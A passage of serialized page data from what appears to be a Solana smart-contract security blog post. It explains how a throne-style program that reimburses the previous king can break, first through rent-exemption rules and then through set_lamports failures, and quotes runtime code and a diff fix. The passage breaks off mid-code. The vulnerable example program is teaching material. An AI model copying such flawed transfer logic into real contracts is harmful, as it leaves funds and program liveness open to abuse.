",{"type":27,"tag":207,"props":79355,"children":79356},{"style":226},[79357],{"type":33,"value":10380},{"type":27,"tag":207,"props":79359,"children":79360},{"style":220},[79361],{"type":33,"value":33108},{"type":27,"tag":207,"props":79363,"children":79364},{"style":226},[79365],{"type":33,"value":1041},{"type":27,"tag":207,"props":79367,"children":79368},{"style":238},[79369],{"type":33,"value":21951},{"type":27,"tag":207,"props":79371,"children":79372},{"style":226},[79373],{"type":33,"value":1041},{"type":27,"tag":207,"props":79375,"children":79376},{"style":238},[79377],{"type":33,"value":79378},"new_king",{"type":27,"tag":207,"props":79380,"children":79381},{"style":226},[79382],{"type":33,"value":1041},{"type":27,"tag":207,"props":79384,"children":79385},{"style":1335},[79386],{"type":33,"value":79387},"key",{"type":27,"tag":207,"props":79389,"children":79390},{"style":238},[79391],{"type":33,"value":4301},{"type":27,"tag":207,"props":79393,"children":79394},{"class":209,"line":8046},[79395,79399,79403,79407,79411,79415,79419,79423,79427,79432],{"type":27,"tag":207,"props":79396,"children":79397},{"style":220},[79398],{"type":33,"value":33451},{"type":27,"tag":207,"props":79400,"children":79401},{"style":226},[79402],{"type":33,"value":1041},{"type":27,"tag":207,"props":79404,"children":79405},{"style":238},[79406],{"type":33,"value":21951},{"type":27,"tag":207,"props":79408,"children":79409},{"style":226},[79410],{"type":33,"value":1041},{"type":27,"tag":207,"props":79412,"children":79413},{"style":238},[79414],{"type":33,"value":78982},{"type":27,"tag":207,"props":79416,"children":79417},{"style":226},[79418],{"type":33,"value":1041},{"type":27,"tag":207,"props":79420,"children":79421},{"style":238},[79422],{"type":33,"value":78991},{"type":27,"tag":207,"props":79424,"children":79425},{"style":226},[79426],{"type":33,"value":10380},{"type":27,"tag":207,"props":79428,"children":79429},{"style":220},[79430],{"type":33,"value":79431}," bid_amount",{"type":27,"tag":207,"props":79433,"children":79434},{"style":238},[79435],{"type":33,"value":241},{"type":27,"tag":207,"props":79437,"children":79438},{"class":209,"line":8055},[79439,79443,79447,79451,79455,79459,79463,79468,79472,79477,79481,79485,79489,79493,79498,79502,79506],{"type":27,"tag":207,"props":79440,"children":79441},{"style":220},[79442],{"type":33,"value":33451},{"type":27,"tag":207,"props":79444,"children":79445},{"style":226},[79446],{"type":33,"value":1041},{"type":27,"tag":207,"props":79448,"children":79449},{"style":238},[79450],{"type":33,"value":21951},{"type":27,"tag":207,"props":79452,"children":79453},{"style":226},[79454],{"type":33,"value":1041},{"type":27,"tag":207,"props":79456,"children":79457},{"style":238},[79458],{"type":33,"value":78982},{"type":27,"tag":207,"props":79460,"children":79461},{"style":226},[79462],{"type":33,"value":1041},{"type":27,"tag":207,"props":79464,"children":79465},{"style":238},[79466],{"type":33,"value":79467},"last_time ",{"type":27,"tag":207,"props":79469,"children":79470},{"style":226},[79471],{"type":33,"value":10380},{"type":27,"tag":207,"props":79473,"children":79474},{"style":8920},[79475],{"type":33,"value":79476}," Clock",{"type":27,"tag":207,"props":79478,"children":79479},{"style":226},[79480],{"type":33,"value":10768},{"type":27,"tag":207,"props":79482,"children":79483},{"style":1335},[79484],{"type":33,"value":23627},{"type":27,"tag":207,"props":79486,"children":79487},{"style":238},[79488],{"type":33,"value":21155},{"type":27,"tag":207,"props":79490,"children":79491},{"style":226},[79492],{"type":33,"value":10421},{"type":27,"tag":207,"props":79494,"children":79495},{"style":238},[79496],{"type":33,"value":79497},"unix_timestamp ",{"type":27,"tag":207,"props":79499,"children":79500},{"style":214},[79501],{"type":33,"value":16122},{"type":27,"tag":207,"props":79503,"children":79504},{"style":8920},[79505],{"type":33,"value":13142},{"type":27,"tag":207,"props":79507,"children":79508},{"style":238},[79509],{"type":33,"value":241},{"type":27,"tag":207,"props":79511,"children":79512},{"class":209,"line":8064},[79513],{"type":27,"tag":207,"props":79514,"children":79515},{"emptyLinePlaceholder":19},[79516],{"type":33,"value":2062},{"type":27,"tag":207,"props":79518,"children":79519},{"class":209,"line":8072},[79520,79524],{"type":27,"tag":207,"props":79521,"children":79522},{"style":8920},[79523],{"type":33,"value":22087},{"type":27,"tag":207,"props":79525,"children":79526},{"style":238},[79527],{"type":33,"value":21614},{"type":27,"tag":207,"props":79529,"children":79530},{"class":209,"line":8081},[79531],{"type":27,"tag":207,"props":79532,"children":79533},{"style":238},[79534],{"type":33,"value":10645},{"type":27,"tag":207,"props":79536,"children":79537},{"class":209,"line":8090},[79538],{"type":27,"tag":207,"props":79539,"children":79540},{"style":238},[79541],{"type":33,"value":451},{"type":27,"tag":36,"props":79543,"children":79544},{},[79545],{"type":33,"value":79546},"Note this comment:",{"type":27,"tag":10222,"props":79548,"children":79549},{},[79550],{"type":27,"tag":36,"props":79551,"children":79552},{},[79553],{"type":33,"value":79554},"any writable account is allowed as a new king.",{"type":27,"tag":36,"props":79556,"children":79557},{},[79558],{"type":33,"value":79559},"...Is our assumption correct?",{"type":27,"tag":28,"props":79561,"children":79563},{"id":79562},"the-bugs-lurking-beneath",[79564],{"type":33,"value":79565},"The Bugs Lurking Beneath",{"type":27,"tag":58,"props":79567,"children":79569},{"id":79568},"bug-1-the-rent-exemption-trap",[79570],{"type":33,"value":79571},"Bug 1: The Rent-Exemption Trap",{"type":27,"tag":36,"props":79573,"children":79574},{},[79575,79577,79582],{"type":33,"value":79576},"On Solana, all accounts must maintain a ",{"type":27,"tag":12606,"props":79578,"children":79579},{},[79580],{"type":33,"value":79581},"minimum balance",{"type":33,"value":79583}," of lamports to remain rent-exempt. Specifically, an account can be in one of two states:",{"type":27,"tag":1228,"props":79585,"children":79586},{},[79587,79602],{"type":27,"tag":1232,"props":79588,"children":79589},{},[79590,79595,79596],{"type":27,"tag":12606,"props":79591,"children":79592},{},[79593],{"type":33,"value":79594},"Uninitialized",{"type":33,"value":22606},{"type":27,"tag":84,"props":79597,"children":79599},{"className":79598},[],[79600],{"type":33,"value":79601},"lamports = 0",{"type":27,"tag":1232,"props":79603,"children":79604},{},[79605,79610,79611],{"type":27,"tag":12606,"props":79606,"children":79607},{},[79608],{"type":33,"value":79609},"Initialized",{"type":33,"value":22606},{"type":27,"tag":84,"props":79612,"children":79614},{"className":79613},[],[79615],{"type":33,"value":79616},"lamports >= rent-exempt threshold",{"type":27,"tag":36,"props":79618,"children":79619},{},[79620,79622,79627],{"type":33,"value":79621},"This rent model exists to prevent low-cost DoS attacks on validators. The key idea is that even an account with no data (i.e., zero-length data buffer) still consumes on-chain resources; specifically, ",{"type":27,"tag":12606,"props":79623,"children":79624},{},[79625],{"type":33,"value":79626},"account metadata",{"type":33,"value":79628}," like its public key, owner, or lamport balance. That metadata must be stored persistently by validators, and that storage isn't free.",{"type":27,"tag":36,"props":79630,"children":79631},{},[79632,79634,79640],{"type":33,"value":79633},"So “persistent state” on Solana doesn’t just mean your program's data — it includes the base account structure itself. Even accounts with ",{"type":27,"tag":84,"props":79635,"children":79637},{"className":79636},[],[79638],{"type":33,"value":79639},"data.len() == 0",{"type":33,"value":79641}," must meet a minimum rent threshold to remain alive and avoid garbage collection by the runtime.",{"type":27,"tag":36,"props":79643,"children":79644},{},[79645,79647,79653],{"type":33,"value":79646},"This is enforced at the runtime level, and the relevant logic can be found ",{"type":27,"tag":47,"props":79648,"children":79651},{"href":79649,"rel":79650},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/svm-rent-collector/src/svm_rent_collector.rs#L117-L136",[51],[79652],{"type":33,"value":54826},{"type":33,"value":1041},{"type":27,"tag":101,"props":79655,"children":79657},{"className":10270,"code":79656,"language":10269,"meta":7,"style":7}," fn transition_allowed(&self, pre_rent_state: &RentState, post_rent_state: &RentState) -> bool {\n match post_rent_state {\n RentState::Uninitialized | RentState::RentExempt => true,\n RentState::RentPaying {\n data_size: post_data_size,\n lamports: post_lamports,\n } => {\n match pre_rent_state {\n RentState::Uninitialized | RentState::RentExempt => false,\n RentState::RentPaying {\n data_size: pre_data_size,\n lamports: pre_lamports,\n } => {\n // Cannot remain RentPaying if resized or credited.\n post_data_size == pre_data_size && post_lamports \u003C= pre_lamports\n }\n }\n }\n }\n }\n",[79658],{"type":27,"tag":84,"props":79659,"children":79660},{"__ignoreMap":7},[79661,79745,79762,79808,79828,79849,79870,79885,79902,79946,79965,79986,80007,80023,80031,80064,80071,80078,80085,80092],{"type":27,"tag":207,"props":79662,"children":79663},{"class":209,"line":210},[79664,79669,79674,79678,79682,79686,79690,79695,79699,79703,79708,79712,79717,79721,79725,79729,79733,79737,79741],{"type":27,"tag":207,"props":79665,"children":79666},{"style":214},[79667],{"type":33,"value":79668}," fn",{"type":27,"tag":207,"props":79670,"children":79671},{"style":1335},[79672],{"type":33,"value":79673}," transition_allowed",{"type":27,"tag":207,"props":79675,"children":79676},{"style":238},[79677],{"type":33,"value":1343},{"type":27,"tag":207,"props":79679,"children":79680},{"style":226},[79681],{"type":33,"value":10398},{"type":27,"tag":207,"props":79683,"children":79684},{"style":214},[79685],{"type":33,"value":20990},{"type":27,"tag":207,"props":79687,"children":79688},{"style":238},[79689],{"type":33,"value":1123},{"type":27,"tag":207,"props":79691,"children":79692},{"style":220},[79693],{"type":33,"value":79694},"pre_rent_state",{"type":27,"tag":207,"props":79696,"children":79697},{"style":226},[79698],{"type":33,"value":736},{"type":27,"tag":207,"props":79700,"children":79701},{"style":226},[79702],{"type":33,"value":14423},{"type":27,"tag":207,"props":79704,"children":79705},{"style":8920},[79706],{"type":33,"value":79707},"RentState",{"type":27,"tag":207,"props":79709,"children":79710},{"style":238},[79711],{"type":33,"value":1123},{"type":27,"tag":207,"props":79713,"children":79714},{"style":220},[79715],{"type":33,"value":79716},"post_rent_state",{"type":27,"tag":207,"props":79718,"children":79719},{"style":226},[79720],{"type":33,"value":736},{"type":27,"tag":207,"props":79722,"children":79723},{"style":226},[79724],{"type":33,"value":14423},{"type":27,"tag":207,"props":79726,"children":79727},{"style":8920},[79728],{"type":33,"value":79707},{"type":27,"tag":207,"props":79730,"children":79731},{"style":238},[79732],{"type":33,"value":2222},{"type":27,"tag":207,"props":79734,"children":79735},{"style":226},[79736],{"type":33,"value":8968},{"type":27,"tag":207,"props":79738,"children":79739},{"style":8920},[79740],{"type":33,"value":19327},{"type":27,"tag":207,"props":79742,"children":79743},{"style":238},[79744],{"type":33,"value":384},{"type":27,"tag":207,"props":79746,"children":79747},{"class":209,"line":244},[79748,79753,79758],{"type":27,"tag":207,"props":79749,"children":79750},{"style":376},[79751],{"type":33,"value":79752}," match",{"type":27,"tag":207,"props":79754,"children":79755},{"style":220},[79756],{"type":33,"value":79757}," post_rent_state",{"type":27,"tag":207,"props":79759,"children":79760},{"style":238},[79761],{"type":33,"value":384},{"type":27,"tag":207,"props":79763,"children":79764},{"class":209,"line":270},[79765,79770,79774,79778,79782,79787,79791,79796,79800,79804],{"type":27,"tag":207,"props":79766,"children":79767},{"style":8920},[79768],{"type":33,"value":79769}," RentState",{"type":27,"tag":207,"props":79771,"children":79772},{"style":226},[79773],{"type":33,"value":10768},{"type":27,"tag":207,"props":79775,"children":79776},{"style":8920},[79777],{"type":33,"value":79594},{"type":27,"tag":207,"props":79779,"children":79780},{"style":226},[79781],{"type":33,"value":11553},{"type":27,"tag":207,"props":79783,"children":79784},{"style":8920},[79785],{"type":33,"value":79786}," RentState",{"type":27,"tag":207,"props":79788,"children":79789},{"style":226},[79790],{"type":33,"value":10768},{"type":27,"tag":207,"props":79792,"children":79793},{"style":8920},[79794],{"type":33,"value":79795},"RentExempt",{"type":27,"tag":207,"props":79797,"children":79798},{"style":226},[79799],{"type":33,"value":35018},{"type":27,"tag":207,"props":79801,"children":79802},{"style":214},[79803],{"type":33,"value":19746},{"type":27,"tag":207,"props":79805,"children":79806},{"style":238},[79807],{"type":33,"value":1842},{"type":27,"tag":207,"props":79809,"children":79810},{"class":209,"line":296},[79811,79815,79819,79824],{"type":27,"tag":207,"props":79812,"children":79813},{"style":8920},[79814],{"type":33,"value":79769},{"type":27,"tag":207,"props":79816,"children":79817},{"style":226},[79818],{"type":33,"value":10768},{"type":27,"tag":207,"props":79820,"children":79821},{"style":8920},[79822],{"type":33,"value":79823},"RentPaying",{"type":27,"tag":207,"props":79825,"children":79826},{"style":238},[79827],{"type":33,"value":384},{"type":27,"tag":207,"props":79829,"children":79830},{"class":209,"line":445},[79831,79836,79840,79845],{"type":27,"tag":207,"props":79832,"children":79833},{"style":220},[79834],{"type":33,"value":79835}," data_size",{"type":27,"tag":207,"props":79837,"children":79838},{"style":226},[79839],{"type":33,"value":736},{"type":27,"tag":207,"props":79841,"children":79842},{"style":220},[79843],{"type":33,"value":79844}," post_data_size",{"type":27,"tag":207,"props":79846,"children":79847},{"style":238},[79848],{"type":33,"value":1842},{"type":27,"tag":207,"props":79850,"children":79851},{"class":209,"line":867},[79852,79857,79861,79866],{"type":27,"tag":207,"props":79853,"children":79854},{"style":220},[79855],{"type":33,"value":79856}," lamports",{"type":27,"tag":207,"props":79858,"children":79859},{"style":226},[79860],{"type":33,"value":736},{"type":27,"tag":207,"props":79862,"children":79863},{"style":220},[79864],{"type":33,"value":79865}," post_lamports",{"type":27,"tag":207,"props":79867,"children":79868},{"style":238},[79869],{"type":33,"value":1842},{"type":27,"tag":207,"props":79871,"children":79872},{"class":209,"line":892},[79873,79877,79881],{"type":27,"tag":207,"props":79874,"children":79875},{"style":238},[79876],{"type":33,"value":77827},{"type":27,"tag":207,"props":79878,"children":79879},{"style":226},[79880],{"type":33,"value":2321},{"type":27,"tag":207,"props":79882,"children":79883},{"style":238},[79884],{"type":33,"value":384},{"type":27,"tag":207,"props":79886,"children":79887},{"class":209,"line":1475},[79888,79893,79898],{"type":27,"tag":207,"props":79889,"children":79890},{"style":376},[79891],{"type":33,"value":79892}," match",{"type":27,"tag":207,"props":79894,"children":79895},{"style":220},[79896],{"type":33,"value":79897}," pre_rent_state",{"type":27,"tag":207,"props":79899,"children":79900},{"style":238},[79901],{"type":33,"value":384},{"type":27,"tag":207,"props":79903,"children":79904},{"class":209,"line":2065},[79905,79910,79914,79918,79922,79926,79930,79934,79938,79942],{"type":27,"tag":207,"props":79906,"children":79907},{"style":8920},[79908],{"type":33,"value":79909}," RentState",{"type":27,"tag":207,"props":79911,"children":79912},{"style":226},[79913],{"type":33,"value":10768},{"type":27,"tag":207,"props":79915,"children":79916},{"style":8920},[79917],{"type":33,"value":79594},{"type":27,"tag":207,"props":79919,"children":79920},{"style":226},[79921],{"type":33,"value":11553},{"type":27,"tag":207,"props":79923,"children":79924},{"style":8920},[79925],{"type":33,"value":79786},{"type":27,"tag":207,"props":79927,"children":79928},{"style":226},[79929],{"type":33,"value":10768},{"type":27,"tag":207,"props":79931,"children":79932},{"style":8920},[79933],{"type":33,"value":79795},{"type":27,"tag":207,"props":79935,"children":79936},{"style":226},[79937],{"type":33,"value":35018},{"type":27,"tag":207,"props":79939,"children":79940},{"style":214},[79941],{"type":33,"value":16337},{"type":27,"tag":207,"props":79943,"children":79944},{"style":238},[79945],{"type":33,"value":1842},{"type":27,"tag":207,"props":79947,"children":79948},{"class":209,"line":2092},[79949,79953,79957,79961],{"type":27,"tag":207,"props":79950,"children":79951},{"style":8920},[79952],{"type":33,"value":79909},{"type":27,"tag":207,"props":79954,"children":79955},{"style":226},[79956],{"type":33,"value":10768},{"type":27,"tag":207,"props":79958,"children":79959},{"style":8920},[79960],{"type":33,"value":79823},{"type":27,"tag":207,"props":79962,"children":79963},{"style":238},[79964],{"type":33,"value":384},{"type":27,"tag":207,"props":79966,"children":79967},{"class":209,"line":2130},[79968,79973,79977,79982],{"type":27,"tag":207,"props":79969,"children":79970},{"style":220},[79971],{"type":33,"value":79972}," data_size",{"type":27,"tag":207,"props":79974,"children":79975},{"style":226},[79976],{"type":33,"value":736},{"type":27,"tag":207,"props":79978,"children":79979},{"style":220},[79980],{"type":33,"value":79981}," pre_data_size",{"type":27,"tag":207,"props":79983,"children":79984},{"style":238},[79985],{"type":33,"value":1842},{"type":27,"tag":207,"props":79987,"children":79988},{"class":209,"line":2168},[79989,79994,79998,80003],{"type":27,"tag":207,"props":79990,"children":79991},{"style":220},[79992],{"type":33,"value":79993}," lamports",{"type":27,"tag":207,"props":79995,"children":79996},{"style":226},[79997],{"type":33,"value":736},{"type":27,"tag":207,"props":79999,"children":80000},{"style":220},[80001],{"type":33,"value":80002}," pre_lamports",{"type":27,"tag":207,"props":80004,"children":80005},{"style":238},[80006],{"type":33,"value":1842},{"type":27,"tag":207,"props":80008,"children":80009},{"class":209,"line":4095},[80010,80015,80019],{"type":27,"tag":207,"props":80011,"children":80012},{"style":238},[80013],{"type":33,"value":80014}," } ",{"type":27,"tag":207,"props":80016,"children":80017},{"style":226},[80018],{"type":33,"value":2321},{"type":27,"tag":207,"props":80020,"children":80021},{"style":238},[80022],{"type":33,"value":384},{"type":27,"tag":207,"props":80024,"children":80025},{"class":209,"line":4103},[80026],{"type":27,"tag":207,"props":80027,"children":80028},{"style":4647},[80029],{"type":33,"value":80030}," // Cannot remain RentPaying if resized or credited.\n",{"type":27,"tag":207,"props":80032,"children":80033},{"class":209,"line":4154},[80034,80039,80043,80047,80051,80055,80059],{"type":27,"tag":207,"props":80035,"children":80036},{"style":220},[80037],{"type":33,"value":80038}," post_data_size",{"type":27,"tag":207,"props":80040,"children":80041},{"style":226},[80042],{"type":33,"value":10572},{"type":27,"tag":207,"props":80044,"children":80045},{"style":220},[80046],{"type":33,"value":79981},{"type":27,"tag":207,"props":80048,"children":80049},{"style":226},[80050],{"type":33,"value":21461},{"type":27,"tag":207,"props":80052,"children":80053},{"style":220},[80054],{"type":33,"value":79865},{"type":27,"tag":207,"props":80056,"children":80057},{"style":226},[80058],{"type":33,"value":15478},{"type":27,"tag":207,"props":80060,"children":80061},{"style":220},[80062],{"type":33,"value":80063}," pre_lamports\n",{"type":27,"tag":207,"props":80065,"children":80066},{"class":209,"line":4203},[80067],{"type":27,"tag":207,"props":80068,"children":80069},{"style":238},[80070],{"type":33,"value":78296},{"type":27,"tag":207,"props":80072,"children":80073},{"class":209,"line":4249},[80074],{"type":27,"tag":207,"props":80075,"children":80076},{"style":238},[80077],{"type":33,"value":78304},{"type":27,"tag":207,"props":80079,"children":80080},{"class":209,"line":4290},[80081],{"type":27,"tag":207,"props":80082,"children":80083},{"style":238},[80084],{"type":33,"value":66118},{"type":27,"tag":207,"props":80086,"children":80087},{"class":209,"line":4304},[80088],{"type":27,"tag":207,"props":80089,"children":80090},{"style":238},[80091],{"type":33,"value":10637},{"type":27,"tag":207,"props":80093,"children":80094},{"class":209,"line":5466},[80095],{"type":27,"tag":207,"props":80096,"children":80097},{"style":238},[80098],{"type":33,"value":10645},{"type":27,"tag":36,"props":80100,"children":80101},{},[80102],{"type":33,"value":80103},"You can check the rent-exemption threshold for a zero-data account with the CLI:",{"type":27,"tag":101,"props":80105,"children":80107},{"className":11527,"code":80106,"language":11526,"meta":7,"style":7},"solana rent 0\nRent-exempt minimum: 0.00089088 SOL\n",[80108],{"type":27,"tag":84,"props":80109,"children":80110},{"__ignoreMap":7},[80111,80127],{"type":27,"tag":207,"props":80112,"children":80113},{"class":209,"line":210},[80114,80118,80123],{"type":27,"tag":207,"props":80115,"children":80116},{"style":1335},[80117],{"type":33,"value":10169},{"type":27,"tag":207,"props":80119,"children":80120},{"style":1325},[80121],{"type":33,"value":80122}," rent",{"type":27,"tag":207,"props":80124,"children":80125},{"style":232},[80126],{"type":33,"value":31543},{"type":27,"tag":207,"props":80128,"children":80129},{"class":209,"line":244},[80130,80135,80140,80145],{"type":27,"tag":207,"props":80131,"children":80132},{"style":1335},[80133],{"type":33,"value":80134},"Rent-exempt",{"type":27,"tag":207,"props":80136,"children":80137},{"style":1325},[80138],{"type":33,"value":80139}," minimum:",{"type":27,"tag":207,"props":80141,"children":80142},{"style":232},[80143],{"type":33,"value":80144}," 0.00089088",{"type":27,"tag":207,"props":80146,"children":80147},{"style":1325},[80148],{"type":33,"value":80149}," SOL\n",{"type":27,"tag":26163,"props":80151,"children":80153},{"id":80152},"fix-1-only-reimburse-if-rent-exempt",[80154],{"type":33,"value":80155},"Fix 1: Only Reimburse if Rent-Exempt",{"type":27,"tag":36,"props":80157,"children":80158},{},[80159],{"type":33,"value":80160},"We don't want to donate anything to an unfair king! So let's update our program to reimburse only if the old king will be rent-exempt after the transfer:",{"type":27,"tag":101,"props":80162,"children":80164},{"className":47605,"code":80163,"language":47607,"meta":7,"style":7},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n+let rent = Rent::get()?;\n+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n transfer_from_pda(\n &ctx.accounts.throne.to_account_info(),\n &ctx.accounts.old_king,\n to_reimburse,\n )?;\n+}\n",[80165],{"type":27,"tag":84,"props":80166,"children":80167},{"__ignoreMap":7},[80168,80176,80184,80192,80200,80208,80216,80224,80232,80240],{"type":27,"tag":207,"props":80169,"children":80170},{"class":209,"line":210},[80171],{"type":27,"tag":207,"props":80172,"children":80173},{"style":238},[80174],{"type":33,"value":80175},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n",{"type":27,"tag":207,"props":80177,"children":80178},{"class":209,"line":244},[80179],{"type":27,"tag":207,"props":80180,"children":80181},{"style":232},[80182],{"type":33,"value":80183},"+let rent = Rent::get()?;\n",{"type":27,"tag":207,"props":80185,"children":80186},{"class":209,"line":270},[80187],{"type":27,"tag":207,"props":80188,"children":80189},{"style":232},[80190],{"type":33,"value":80191},"+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n",{"type":27,"tag":207,"props":80193,"children":80194},{"class":209,"line":296},[80195],{"type":27,"tag":207,"props":80196,"children":80197},{"style":232},[80198],{"type":33,"value":80199},"+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n",{"type":27,"tag":207,"props":80201,"children":80202},{"class":209,"line":445},[80203],{"type":27,"tag":207,"props":80204,"children":80205},{"style":238},[80206],{"type":33,"value":80207}," transfer_from_pda(\n",{"type":27,"tag":207,"props":80209,"children":80210},{"class":209,"line":867},[80211],{"type":27,"tag":207,"props":80212,"children":80213},{"style":238},[80214],{"type":33,"value":80215}," &ctx.accounts.throne.to_account_info(),\n",{"type":27,"tag":207,"props":80217,"children":80218},{"class":209,"line":892},[80219],{"type":27,"tag":207,"props":80220,"children":80221},{"style":238},[80222],{"type":33,"value":80223}," &ctx.accounts.old_king,\n",{"type":27,"tag":207,"props":80225,"children":80226},{"class":209,"line":1475},[80227],{"type":27,"tag":207,"props":80228,"children":80229},{"style":238},[80230],{"type":33,"value":80231}," to_reimburse,\n",{"type":27,"tag":207,"props":80233,"children":80234},{"class":209,"line":2065},[80235],{"type":27,"tag":207,"props":80236,"children":80237},{"style":238},[80238],{"type":33,"value":80239}," )?;\n",{"type":27,"tag":207,"props":80241,"children":80242},{"class":209,"line":2092},[80243],{"type":27,"tag":207,"props":80244,"children":80245},{"style":232},[80246],{"type":33,"value":80247},"+}\n",{"type":27,"tag":36,"props":80249,"children":80250},{},[80251],{"type":33,"value":80252},"But is rent-exemption the only thing that can cause a lamport transfer to fail? Not quite.",{"type":27,"tag":58,"props":80254,"children":80256},{"id":80255},"bug-2-writable-but-untouchable-set_lamports-fails",[80257,80259,80265],{"type":33,"value":80258},"Bug 2: Writable but Untouchable — ",{"type":27,"tag":84,"props":80260,"children":80262},{"className":80261},[],[80263],{"type":33,"value":80264},"set_lamports",{"type":33,"value":80266}," Fails",{"type":27,"tag":36,"props":80268,"children":80269},{},[80270,80272,80279],{"type":33,"value":80271},"Let's look at ",{"type":27,"tag":47,"props":80273,"children":80276},{"href":80274,"rel":80275},"https://github.com/anza-xyz/agave/blob/f389dd23067e37d756c3f9d2f3d50e339dad7053/transaction-context/src/lib.rs#L863-L885",[51],[80277],{"type":33,"value":80278},"BorrowedAccount::set_lamports",{"type":33,"value":1041},{"type":27,"tag":101,"props":80281,"children":80283},{"className":10270,"code":80282,"language":10269,"meta":7,"style":7},"/// Overwrites the number of lamports of this account (transaction wide)\n#[cfg(not(target_os = \"solana\"))]\npub fn set_lamports(&mut self, lamports: u64) -> Result\u003C(), InstructionError> {\n // An account not owned by the program cannot have its balance decrease\n if !self.is_owned_by_current_program() && lamports \u003C self.get_lamports() {\n return Err(InstructionError::ExternalAccountLamportSpend);\n }\n // The balance of read-only may not change\n if !self.is_writable() {\n return Err(InstructionError::ReadonlyLamportChange);\n }\n // The balance of executable accounts may not change\n if self.is_executable_internal() {\n return Err(InstructionError::ExecutableLamportChange);\n }\n // don't touch the account if the lamports do not change\n if self.get_lamports() == lamports {\n return Ok(());\n }\n self.touch()?;\n self.account.set_lamports(lamports);\n Ok(())\n}\n\n/// Feature gating to remove `is_executable` flag related checks\n#[cfg(not(target_os = \"solana\"))]\n#[inline]\nfn is_executable_internal(&self) -> bool {\n !self\n .transaction_context\n .remove_accounts_executable_flag_checks\n && self.account.executable()\n}\n\n",[80284],{"type":27,"tag":84,"props":80285,"children":80286},{"__ignoreMap":7},[80287,80295,80316,80388,80396,80455,80487,80494,80502,80530,80562,80569,80577,80601,80633,80640,80648,80683,80699,80706,80734,80769,80780,80787,80794,80802,80821,80829,80869,80881,80893,80905,80936],{"type":27,"tag":207,"props":80288,"children":80289},{"class":209,"line":210},[80290],{"type":27,"tag":207,"props":80291,"children":80292},{"style":4647},[80293],{"type":33,"value":80294},"/// Overwrites the number of lamports of this account (transaction wide)\n",{"type":27,"tag":207,"props":80296,"children":80297},{"class":209,"line":244},[80298,80303,80307,80312],{"type":27,"tag":207,"props":80299,"children":80300},{"style":238},[80301],{"type":33,"value":80302},"#[cfg(not(target_os ",{"type":27,"tag":207,"props":80304,"children":80305},{"style":226},[80306],{"type":33,"value":10380},{"type":27,"tag":207,"props":80308,"children":80309},{"style":1325},[80310],{"type":33,"value":80311}," \"solana\"",{"type":27,"tag":207,"props":80313,"children":80314},{"style":238},[80315],{"type":33,"value":27880},{"type":27,"tag":207,"props":80317,"children":80318},{"class":209,"line":270},[80319,80323,80327,80332,80336,80340,80344,80348,80352,80356,80360,80364,80368,80372,80376,80380,80384],{"type":27,"tag":207,"props":80320,"children":80321},{"style":214},[80322],{"type":33,"value":20967},{"type":27,"tag":207,"props":80324,"children":80325},{"style":214},[80326],{"type":33,"value":20972},{"type":27,"tag":207,"props":80328,"children":80329},{"style":1335},[80330],{"type":33,"value":80331}," set_lamports",{"type":27,"tag":207,"props":80333,"children":80334},{"style":238},[80335],{"type":33,"value":1343},{"type":27,"tag":207,"props":80337,"children":80338},{"style":226},[80339],{"type":33,"value":10398},{"type":27,"tag":207,"props":80341,"children":80342},{"style":214},[80343],{"type":33,"value":11009},{"type":27,"tag":207,"props":80345,"children":80346},{"style":214},[80347],{"type":33,"value":21073},{"type":27,"tag":207,"props":80349,"children":80350},{"style":238},[80351],{"type":33,"value":1123},{"type":27,"tag":207,"props":80353,"children":80354},{"style":220},[80355],{"type":33,"value":22787},{"type":27,"tag":207,"props":80357,"children":80358},{"style":226},[80359],{"type":33,"value":736},{"type":27,"tag":207,"props":80361,"children":80362},{"style":8920},[80363],{"type":33,"value":13142},{"type":27,"tag":207,"props":80365,"children":80366},{"style":238},[80367],{"type":33,"value":2222},{"type":27,"tag":207,"props":80369,"children":80370},{"style":226},[80371],{"type":33,"value":8968},{"type":27,"tag":207,"props":80373,"children":80374},{"style":8920},[80375],{"type":33,"value":21038},{"type":27,"tag":207,"props":80377,"children":80378},{"style":238},[80379],{"type":33,"value":21043},{"type":27,"tag":207,"props":80381,"children":80382},{"style":8920},[80383],{"type":33,"value":23033},{"type":27,"tag":207,"props":80385,"children":80386},{"style":238},[80387],{"type":33,"value":14563},{"type":27,"tag":207,"props":80389,"children":80390},{"class":209,"line":296},[80391],{"type":27,"tag":207,"props":80392,"children":80393},{"style":4647},[80394],{"type":33,"value":80395}," // An account not owned by the program cannot have its balance decrease\n",{"type":27,"tag":207,"props":80397,"children":80398},{"class":209,"line":445},[80399,80403,80407,80411,80415,80420,80424,80429,80434,80438,80442,80446,80451],{"type":27,"tag":207,"props":80400,"children":80401},{"style":376},[80402],{"type":33,"value":19556},{"type":27,"tag":207,"props":80404,"children":80405},{"style":226},[80406],{"type":33,"value":20141},{"type":27,"tag":207,"props":80408,"children":80409},{"style":214},[80410],{"type":33,"value":20990},{"type":27,"tag":207,"props":80412,"children":80413},{"style":226},[80414],{"type":33,"value":1041},{"type":27,"tag":207,"props":80416,"children":80417},{"style":1335},[80418],{"type":33,"value":80419},"is_owned_by_current_program",{"type":27,"tag":207,"props":80421,"children":80422},{"style":238},[80423],{"type":33,"value":21319},{"type":27,"tag":207,"props":80425,"children":80426},{"style":226},[80427],{"type":33,"value":80428},"&&",{"type":27,"tag":207,"props":80430,"children":80431},{"style":220},[80432],{"type":33,"value":80433}," 